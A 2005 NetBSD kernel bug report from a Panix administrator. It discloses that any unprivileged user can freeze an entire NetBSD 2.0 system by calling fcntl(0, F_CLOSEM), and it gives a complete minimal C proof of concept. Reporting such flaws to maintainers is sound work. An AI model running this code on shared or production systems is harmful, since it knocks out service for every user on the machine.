Subject: kern/28929: fcntl F_CLOSEM can hang entire system
To: None <kern-bug-people@netbsd.org, gnats-admin@netbsd.org,>
From: None <marcotte@panix.com>
List: netbsd-bugs
Date: 01/10/2005 16:09:01
>Number:         28929
>Category:       kern
>Synopsis:       fcntl F_CLOSEM can hang entire system
>Confidential:   yes
>Severity:       critical
>Priority:       high
>Responsible:    kern-bug-people
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Mon Jan 10 16:09:01 +0000 2005
>Originator:     Brian Marcotte
>Release:        NetBSD 2.0
>Organization:
	Panix
>Environment:
System: NetBSD panix5.panix.com 2.0 NetBSD 2.0 (PANIX-USER) #1: Fri Jan 7 20:17:17 EST 2005 root@trinity.nyc.access.net:/devel/netbsd/2.0/src/sys/arch/i386/compile/PANIX-USER i386
Architecture: i386
Machine: i386
>Description:
	An ordinary user can use fcntl(0,F_CLOSEM) and immediately hang
	the entire system.

	This, of course, is a local denial of service attack.
>How-To-Repeat:
	If you compile and run this program, the system immediately locks
	up. You do NOT need to be root.

	#include <fcntl.h>

	int
	main()
	{
		fcntl(0, F_CLOSEM);
	}

>Fix:
	Don't know.